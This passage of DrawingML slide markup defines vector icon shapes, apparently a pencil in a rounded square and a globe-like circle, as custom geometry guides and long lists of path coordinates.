              <a:gd name="T83" fmla="*/ 591 h 1718"/>
              <a:gd name="T84" fmla="*/ 1526 w 1846"/>
              <a:gd name="T85" fmla="*/ 571 h 1718"/>
              <a:gd name="T86" fmla="*/ 1518 w 1846"/>
              <a:gd name="T87" fmla="*/ 529 h 1718"/>
              <a:gd name="T88" fmla="*/ 1498 w 1846"/>
              <a:gd name="T89" fmla="*/ 494 h 1718"/>
              <a:gd name="T90" fmla="*/ 1311 w 1846"/>
              <a:gd name="T91" fmla="*/ 327 h 1718"/>
              <a:gd name="T92" fmla="*/ 1276 w 1846"/>
              <a:gd name="T93" fmla="*/ 306 h 1718"/>
              <a:gd name="T94" fmla="*/ 1228 w 1846"/>
              <a:gd name="T95" fmla="*/ 299 h 1718"/>
              <a:gd name="T96" fmla="*/ 1165 w 1846"/>
              <a:gd name="T97" fmla="*/ 313 h 1718"/>
              <a:gd name="T98" fmla="*/ 1041 w 1846"/>
              <a:gd name="T99" fmla="*/ 431 h 17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846" h="1718">
                <a:moveTo>
                  <a:pt x="1845" y="320"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1845" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1845" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1823" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1789" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1692" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="1696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="1696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="1661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="1619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="1571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="1515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1567" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1629" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1692" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1789" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1823" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1845" y="320"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="652" y="1432"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1311" y="820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305" y="1112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305" y="1432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="652" y="1432"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="486" y="1098"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="666" y="1265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541" y="1321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541" y="1216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423" y="1216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486" y="1098"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="985" y="661"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="985" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992" y="668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992" y="675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="1021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="631" y="1021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="1028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604" y="1028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590" y="1021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590" y="1021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590" y="1014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583" y="1007"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="943" y="661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="964" y="654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978" y="654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="985" y="661"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1387" y="751"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1498" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518" y="612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1526" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1526" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1526" y="571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1526" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1518" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1511" y="515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1311" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1311" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1297" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1276" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228" y="299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1228" y="299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1186" y="306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165" y="313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1151" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1387" y="75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Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="702807" y="2526529"/>
            <a:ext cx="399878" cy="397301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1580 w 1851"/>
              <a:gd name="T1" fmla="*/ 251 h 1718"/>
              <a:gd name="T2" fmla="*/ 1656 w 1851"/>
              <a:gd name="T3" fmla="*/ 1383 h 1718"/>
              <a:gd name="T4" fmla="*/ 464 w 1851"/>
              <a:gd name="T5" fmla="*/ 1599 h 1718"/>
              <a:gd name="T6" fmla="*/ 124 w 1851"/>
              <a:gd name="T7" fmla="*/ 431 h 1718"/>
              <a:gd name="T8" fmla="*/ 1240 w 1851"/>
              <a:gd name="T9" fmla="*/ 584 h 1718"/>
              <a:gd name="T10" fmla="*/ 1420 w 1851"/>
              <a:gd name="T11" fmla="*/ 536 h 1718"/>
              <a:gd name="T12" fmla="*/ 1420 w 1851"/>
              <a:gd name="T13" fmla="*/ 466 h 1718"/>
              <a:gd name="T14" fmla="*/ 1338 w 1851"/>
              <a:gd name="T15" fmla="*/ 397 h 1718"/>
              <a:gd name="T16" fmla="*/ 1296 w 1851"/>
              <a:gd name="T17" fmla="*/ 397 h 1718"/>
              <a:gd name="T18" fmla="*/ 1261 w 1851"/>
              <a:gd name="T19" fmla="*/ 403 h 1718"/>
              <a:gd name="T20" fmla="*/ 1206 w 1851"/>
              <a:gd name="T21" fmla="*/ 348 h 1718"/>
              <a:gd name="T22" fmla="*/ 1108 w 1851"/>
              <a:gd name="T23" fmla="*/ 383 h 1718"/>
              <a:gd name="T24" fmla="*/ 1088 w 1851"/>
              <a:gd name="T25" fmla="*/ 480 h 1718"/>
              <a:gd name="T26" fmla="*/ 1067 w 1851"/>
              <a:gd name="T27" fmla="*/ 529 h 1718"/>
              <a:gd name="T28" fmla="*/ 901 w 1851"/>
              <a:gd name="T29" fmla="*/ 424 h 1718"/>
              <a:gd name="T30" fmla="*/ 866 w 1851"/>
              <a:gd name="T31" fmla="*/ 341 h 1718"/>
              <a:gd name="T32" fmla="*/ 984 w 1851"/>
              <a:gd name="T33" fmla="*/ 251 h 1718"/>
              <a:gd name="T34" fmla="*/ 1032 w 1851"/>
              <a:gd name="T35" fmla="*/ 209 h 1718"/>
              <a:gd name="T36" fmla="*/ 943 w 1851"/>
              <a:gd name="T37" fmla="*/ 237 h 1718"/>
              <a:gd name="T38" fmla="*/ 873 w 1851"/>
              <a:gd name="T39" fmla="*/ 195 h 1718"/>
              <a:gd name="T40" fmla="*/ 818 w 1851"/>
              <a:gd name="T41" fmla="*/ 195 h 1718"/>
              <a:gd name="T42" fmla="*/ 825 w 1851"/>
              <a:gd name="T43" fmla="*/ 251 h 1718"/>
              <a:gd name="T44" fmla="*/ 741 w 1851"/>
              <a:gd name="T45" fmla="*/ 237 h 1718"/>
              <a:gd name="T46" fmla="*/ 679 w 1851"/>
              <a:gd name="T47" fmla="*/ 181 h 1718"/>
              <a:gd name="T48" fmla="*/ 686 w 1851"/>
              <a:gd name="T49" fmla="*/ 230 h 1718"/>
              <a:gd name="T50" fmla="*/ 602 w 1851"/>
              <a:gd name="T51" fmla="*/ 237 h 1718"/>
              <a:gd name="T52" fmla="*/ 297 w 1851"/>
              <a:gd name="T53" fmla="*/ 515 h 1718"/>
              <a:gd name="T54" fmla="*/ 367 w 1851"/>
              <a:gd name="T55" fmla="*/ 591 h 1718"/>
              <a:gd name="T56" fmla="*/ 353 w 1851"/>
              <a:gd name="T57" fmla="*/ 710 h 1718"/>
              <a:gd name="T58" fmla="*/ 422 w 1851"/>
              <a:gd name="T59" fmla="*/ 828 h 1718"/>
              <a:gd name="T60" fmla="*/ 506 w 1851"/>
              <a:gd name="T61" fmla="*/ 931 h 1718"/>
              <a:gd name="T62" fmla="*/ 561 w 1851"/>
              <a:gd name="T63" fmla="*/ 1014 h 1718"/>
              <a:gd name="T64" fmla="*/ 513 w 1851"/>
              <a:gd name="T65" fmla="*/ 882 h 1718"/>
              <a:gd name="T66" fmla="*/ 589 w 1851"/>
              <a:gd name="T67" fmla="*/ 966 h 1718"/>
              <a:gd name="T68" fmla="*/ 665 w 1851"/>
              <a:gd name="T69" fmla="*/ 1098 h 1718"/>
              <a:gd name="T70" fmla="*/ 790 w 1851"/>
              <a:gd name="T71" fmla="*/ 1168 h 1718"/>
              <a:gd name="T72" fmla="*/ 950 w 1851"/>
              <a:gd name="T73" fmla="*/ 1223 h 1718"/>
              <a:gd name="T74" fmla="*/ 1032 w 1851"/>
              <a:gd name="T75" fmla="*/ 1300 h 1718"/>
              <a:gd name="T76" fmla="*/ 1019 w 1851"/>
              <a:gd name="T77" fmla="*/ 1258 h 1718"/>
              <a:gd name="T78" fmla="*/ 1019 w 1851"/>
              <a:gd name="T79" fmla="*/ 1195 h 1718"/>
              <a:gd name="T80" fmla="*/ 950 w 1851"/>
              <a:gd name="T81" fmla="*/ 1168 h 1718"/>
              <a:gd name="T82" fmla="*/ 956 w 1851"/>
              <a:gd name="T83" fmla="*/ 1070 h 1718"/>
              <a:gd name="T84" fmla="*/ 852 w 1851"/>
              <a:gd name="T85" fmla="*/ 1126 h 1718"/>
              <a:gd name="T86" fmla="*/ 783 w 1851"/>
              <a:gd name="T87" fmla="*/ 959 h 1718"/>
              <a:gd name="T88" fmla="*/ 825 w 1851"/>
              <a:gd name="T89" fmla="*/ 924 h 1718"/>
              <a:gd name="T90" fmla="*/ 908 w 1851"/>
              <a:gd name="T91" fmla="*/ 889 h 1718"/>
              <a:gd name="T92" fmla="*/ 1005 w 1851"/>
              <a:gd name="T93" fmla="*/ 924 h 1718"/>
              <a:gd name="T94" fmla="*/ 1067 w 1851"/>
              <a:gd name="T95" fmla="*/ 966 h 1718"/>
              <a:gd name="T96" fmla="*/ 1060 w 1851"/>
              <a:gd name="T97" fmla="*/ 862 h 1718"/>
              <a:gd name="T98" fmla="*/ 1130 w 1851"/>
              <a:gd name="T99" fmla="*/ 793 h 1718"/>
              <a:gd name="T100" fmla="*/ 1164 w 1851"/>
              <a:gd name="T101" fmla="*/ 744 h 1718"/>
              <a:gd name="T102" fmla="*/ 1226 w 1851"/>
              <a:gd name="T103" fmla="*/ 675 h 1718"/>
              <a:gd name="T104" fmla="*/ 1310 w 1851"/>
              <a:gd name="T105" fmla="*/ 605 h 1718"/>
              <a:gd name="T106" fmla="*/ 1282 w 1851"/>
              <a:gd name="T107" fmla="*/ 571 h 1718"/>
              <a:gd name="T108" fmla="*/ 1462 w 1851"/>
              <a:gd name="T109" fmla="*/ 1348 h 1718"/>
              <a:gd name="T110" fmla="*/ 1372 w 1851"/>
              <a:gd name="T111" fmla="*/ 1285 h 1718"/>
              <a:gd name="T112" fmla="*/ 1310 w 1851"/>
              <a:gd name="T113" fmla="*/ 1285 h 1718"/>
              <a:gd name="T114" fmla="*/ 1206 w 1851"/>
              <a:gd name="T115" fmla="*/ 1272 h 1718"/>
              <a:gd name="T116" fmla="*/ 1178 w 1851"/>
              <a:gd name="T117" fmla="*/ 1244 h 1718"/>
              <a:gd name="T118" fmla="*/ 1108 w 1851"/>
              <a:gd name="T119" fmla="*/ 1293 h 1718"/>
              <a:gd name="T120" fmla="*/ 1060 w 1851"/>
              <a:gd name="T121" fmla="*/ 1487 h 17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851" h="1718">
                <a:moveTo>
                  <a:pt x="464" y="118"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="464" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1490" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1656" y="334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1781" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816" y="633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1850" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1837" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1816" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1781" y="1188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1726" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1656" y="1383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580" y="1467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1490" y="1536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1386" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="1654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164" y="1689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1046" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="921" y="1717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="803" y="1710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686" y="1689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568" y="1654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464" y="1599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="1536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270" y="1467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="1383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="1285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="1188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="1084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270" y="251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464" y="118"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1255" y="584"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1255" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1268" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1379" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400" y="549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442" y="529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1455" y="522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1462" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1449" y="494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1442" y="487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1427" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1427" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1420" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1407" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393" y="466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1372" y="459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365" y="439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1358" y="424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1338" y="390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1331" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1317" y="376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1296" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1289" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261" y="403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1240" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1233" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226" y="354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1206" y="348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1123" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1108" y="383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1102" y="410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1115" y="417"/>
                </a:lnTo>
                <a:lnTo>
